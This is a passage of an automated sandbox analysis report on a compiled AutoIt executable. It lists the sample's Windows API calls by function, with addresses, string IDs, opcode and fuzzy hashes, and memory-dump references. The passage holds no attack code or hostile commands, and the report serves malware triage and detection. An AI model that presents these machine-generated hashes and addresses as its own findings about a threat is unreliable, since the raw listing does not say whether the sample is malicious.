                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006779C9
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006779D2
                                                    • DeleteDC.GDI32(00000000), ref: 006779DB
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00677A07
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00677A1E
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00677A59
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00677A6D
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00677A7E
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00677AAE
                                                    • GetStockObject.GDI32(00000011), ref: 00677AB9
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00677AC4
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00677ACE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: efc45da3846c826a0f1258ffd2cfbf4ea6eef16f1cea39957c528a0c383d0e96
                                                    • Instruction ID: b9a9aafb43010fb9e221224af838e55e3b53c2e3f035e6ff2e670045675aa6f9
                                                    • Opcode Fuzzy Hash: efc45da3846c826a0f1258ffd2cfbf4ea6eef16f1cea39957c528a0c383d0e96
                                                    • Instruction Fuzzy Hash: 34A16371A40215BFEB14DBA4DC4AFAF7BBAEB44714F108214FA15A72E1D774AD00CB64
                                                    Function 0066AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066AF89
                                                    • GetDriveTypeW.KERNEL32(?,0068FAC0,?,\\.\,0068F910), ref: 0066B066
                                                    • SetErrorMode.KERNEL32(00000000,0068FAC0,?,\\.\,0068F910), ref: 0066B1C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 939ca0f4b347c4d944dd5e16ee3e255b4e83872c5f75bb35fd337a9327aedb3d
                                                    • Instruction ID: abf7bda2a1e96c205ee7ad2094f35dbe32b4839a3bdc3bc9f13b8795f937b4cc
                                                    • Opcode Fuzzy Hash: 939ca0f4b347c4d944dd5e16ee3e255b4e83872c5f75bb35fd337a9327aedb3d
                                                    • Instruction Fuzzy Hash: 5351C674684305FBCB14EB90C9A28FEB7B3EB163417215029F406E7291DB75ADC2DB52
                                                    Function 00606A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: bdf2fbcf027bc83a8a98a6a93eecf0a46c9c8d61f8e899a9f96c50712efaee77
                                                    • Instruction ID: 40afe2a9800025d314629d458e10810bbc1fc654190ecbe54384c8dda681bdd7
                                                    • Opcode Fuzzy Hash: bdf2fbcf027bc83a8a98a6a93eecf0a46c9c8d61f8e899a9f96c50712efaee77
                                                    • Instruction Fuzzy Hash: 8F813EB0780615B7CB64BB64DC83FEF776BAF15300F044029F941AA2C1FB61EA61C6A5
                                                    Function 0068AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0068AB99
                                                    • SetTextColor.GDI32(?,?), ref: 0068AB9D
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0068ABB3
                                                    • GetSysColor.USER32(0000000F), ref: 0068ABBE
                                                    • CreateSolidBrush.GDI32(?), ref: 0068ABC3
                                                    • GetSysColor.USER32(00000011), ref: 0068ABDB
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068ABE9
                                                    • SelectObject.GDI32(?,00000000), ref: 0068ABFA
                                                    • SetBkColor.GDI32(?,00000000), ref: 0068AC03
                                                    • SelectObject.GDI32(?,?), ref: 0068AC10
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0068AC2F
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068AC46
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0068AC5B
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068ACA7
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0068ACCE
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0068ACEC
                                                    • DrawFocusRect.USER32(?,?), ref: 0068ACF7
                                                    • GetSysColor.USER32(00000011), ref: 0068AD05
                                                    • SetTextColor.GDI32(?,00000000), ref: 0068AD0D
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0068AD21
                                                    • SelectObject.GDI32(?,0068A869), ref: 0068AD38
                                                    • DeleteObject.GDI32(?), ref: 0068AD43
                                                    • SelectObject.GDI32(?,?), ref: 0068AD49
                                                    • DeleteObject.GDI32(?), ref: 0068AD4E
                                                    • SetTextColor.GDI32(?,?), ref: 0068AD54
                                                    • SetBkColor.GDI32(?,?), ref: 0068AD5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: b7b78244fbeff1860db382363607a3c7d839855071fd5dd5bfb07333df576fba
                                                    • Instruction ID: 07ad4b80574e143681924ed1528215cd838f1d0434b4dc17aa109472177a01ee
                                                    • Opcode Fuzzy Hash: b7b78244fbeff1860db382363607a3c7d839855071fd5dd5bfb07333df576fba
                                                    • Instruction Fuzzy Hash: 0A612E71900218FFEF119FA4DC48EAE7B7AEB08720F245226F915AB2A1D7759D40DB90
                                                    Function 00688C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00688D34
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688D45
                                                    • CharNextW.USER32(0000014E), ref: 00688D74
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00688DB5
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00688DCB
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688DDC
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00688DF9
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00688E45
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00688E5B
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00688E8C
                                                    • _memset.LIBCMT ref: 00688EB1
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00688EFA
                                                    • _memset.LIBCMT ref: 00688F59
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00688F83
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00688FDB
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00689088
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006890AA
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006890F4
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00689121
                                                    • DrawMenuBar.USER32(?), ref: 00689130
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00689158
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 02e3ae8a52c9d619b95acce0e939dfb38d8ebb8a50e9c7858202e547d367ba53
                                                    • Instruction ID: 539572ee25e0436dbba8fd4574da62efd3b4431e4068e3066de6c6734cb19674
                                                    • Opcode Fuzzy Hash: 02e3ae8a52c9d619b95acce0e939dfb38d8ebb8a50e9c7858202e547d367ba53
                                                    • Instruction Fuzzy Hash: C9E17070900219BEDF20AF64CC88EFE7BBAEF05710F548259F9559B291DB708A81DF64
                                                    Function 00684B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00684C51
                                                    • GetDesktopWindow.USER32 ref: 00684C66
                                                    • GetWindowRect.USER32(00000000), ref: 00684C6D
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00684CCF
                                                    • DestroyWindow.USER32(?), ref: 00684CFB
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00684D24
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00684D42
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00684D68
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00684D7D
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00684D90
                                                    • IsWindowVisible.USER32(?), ref: 00684DB0
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00684DCB
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00684DDF
                                                    • GetWindowRect.USER32(?,?), ref: 00684DF7
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00684E1D
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00684E37
                                                    • CopyRect.USER32(?,?), ref: 00684E4E
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00684EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: d4768a6e62ae72d4614899cc24afa17310ef49d9fcb80a33e210d8e438fcaa1f
                                                    • Instruction ID: 3954e3bbfd57f2d2dd234e7493e10cd0f75ebcf1fdab5e7df07d7e141da45779
                                                    • Opcode Fuzzy Hash: d4768a6e62ae72d4614899cc24afa17310ef49d9fcb80a33e210d8e438fcaa1f
                                                    • Instruction Fuzzy Hash: 39B16B71604341AFDB44DF64C848B6ABBE6FF88314F008A1CF5999B2A2DB71EC45CB95
                                                    Function 006027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028BC
                                                    • GetSystemMetrics.USER32(00000007), ref: 006028C4
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006028EF
                                                    • GetSystemMetrics.USER32(00000008), ref: 006028F7
                                                    • GetSystemMetrics.USER32(00000004), ref: 0060291C
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00602939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00602949
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0060297C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00602990
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 006029AE
                                                    • GetStockObject.GDI32(00000011), ref: 006029CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 006029D5
                                                      • Part of subcall function 00602344: GetCursorPos.USER32(?), ref: 00602357
                                                      • Part of subcall function 00602344: ScreenToClient.USER32(006C67B0,?), ref: 00602374
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,00601256), ref: 006029FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 8b0b19a733a30f5f9d694be352fe0a684328409c2faf9ea19e423f7be4b7d686
                                                    • Instruction ID: b479fd2528e3e16daebc98b88e8dfe6c83be66ef8785d5d132013a6efd7bf326
                                                    • Opcode Fuzzy Hash: 8b0b19a733a30f5f9d694be352fe0a684328409c2faf9ea19e423f7be4b7d686
                                                    • Instruction Fuzzy Hash: 8AB15E7164020AAFDB14DF68DC59BEE7BA6FF08314F108229FA15A72D0DB74E851CB64
                                                    Function 00684069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 006840F6
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006841B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: ab58c724d311048e92c3337594c3917987f6d3b4c5eff75b2d64509045bd1e17
                                                    • Instruction ID: ed72ec7b440f15638a8b44618eaa28c224305fc724a09cd873c15bf5711187bf
                                                    • Opcode Fuzzy Hash: ab58c724d311048e92c3337594c3917987f6d3b4c5eff75b2d64509045bd1e17
                                                    • Instruction Fuzzy Hash: 79A18E302542129FCB58FF20C851AAAB7A7AF84314F144A6CB8969B7D3DF30ED06CB55
                                                    Function 006752F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00675309
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00675314
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0067531F
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0067532A
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00675335
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00675340
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0067534B
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00675356
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00675361
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0067536C
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00675377
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00675382
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0067538D
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00675398
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 006753A3
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 006753AE
                                                    • GetCursorInfo.USER32(?), ref: 006753BE
                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 006753E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: a7d0381f1352b4a08e9630e4eb9169f4bc28457cd9acb0ea77f13a76df40275b
                                                    • Instruction ID: eb1f96b42129c871a7ff35681d5c3c438fddb278484b178dcec1e2f0bbaf5ba0
                                                    • Opcode Fuzzy Hash: a7d0381f1352b4a08e9630e4eb9169f4bc28457cd9acb0ea77f13a76df40275b
                                                    • Instruction Fuzzy Hash: DF416270E043196ADB109FBA8C4996FFFF9EF51B60B10452FE509E7291DAB8A401CF61
                                                    Function 0065AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065AAA5
                                                    • __swprintf.LIBCMT ref: 0065AB46
                                                    • _wcscmp.LIBCMT ref: 0065AB59
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0065ABAE
                                                    • _wcscmp.LIBCMT ref: 0065ABEA
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0065AC21
                                                    • GetDlgCtrlID.USER32(?), ref: 0065AC73
                                                    • GetWindowRect.USER32(?,?), ref: 0065ACA9
                                                    • GetParent.USER32(?), ref: 0065ACC7
                                                    • ScreenToClient.USER32(00000000), ref: 0065ACCE
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065AD48
                                                    • _wcscmp.LIBCMT ref: 0065AD5C
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0065AD82
                                                    • _wcscmp.LIBCMT ref: 0065AD96
                                                      • Part of subcall function 0062386C: _iswctype.LIBCMT ref: 00623874
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: 371f0c77455036b296f7999d91d0b8dd3153764d8658bad76bdc5b5dd7b435cf
                                                    • Instruction ID: dbd2651d30a13b49343eac933e421d95ab5b08816affd2262884ad450db78fce
                                                    • Opcode Fuzzy Hash: 371f0c77455036b296f7999d91d0b8dd3153764d8658bad76bdc5b5dd7b435cf
                                                    • Instruction Fuzzy Hash: 16A1AF71204616AFD714EFA4C884BEAB7EAFF04356F10472DFD9982290D730E959CB92
                                                    Function 0065B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0065B3DB
                                                    • _wcscmp.LIBCMT ref: 0065B3EC
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0065B414
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0065B431
                                                    • _wcscmp.LIBCMT ref: 0065B44F
                                                    • _wcsstr.LIBCMT ref: 0065B460
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0065B498
                                                    • _wcscmp.LIBCMT ref: 0065B4A8
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0065B4CF
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0065B518
                                                    • _wcscmp.LIBCMT ref: 0065B528
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0065B550
                                                    • GetWindowRect.USER32(00000004,?), ref: 0065B5B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: 386e041b5a7cafc5f788c10247a97dcd5abe90409b9739d620bd78d3ca88236c
                                                    • Instruction ID: 93718faed882af94854846a6fa4b1da2189b27f3ab587fb875ea80b223054275
                                                    • Opcode Fuzzy Hash: 386e041b5a7cafc5f788c10247a97dcd5abe90409b9739d620bd78d3ca88236c
                                                    • Instruction Fuzzy Hash: 4181E0710043059FDB14CF10D881FAA77EAEF44315F08A56DFD858A296EB34DD49CBA1
                                                    Function 0068C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 0068C917
                                                      • Part of subcall function 0068ADF1: ClientToScreen.USER32(?,?), ref: 0068AE1A
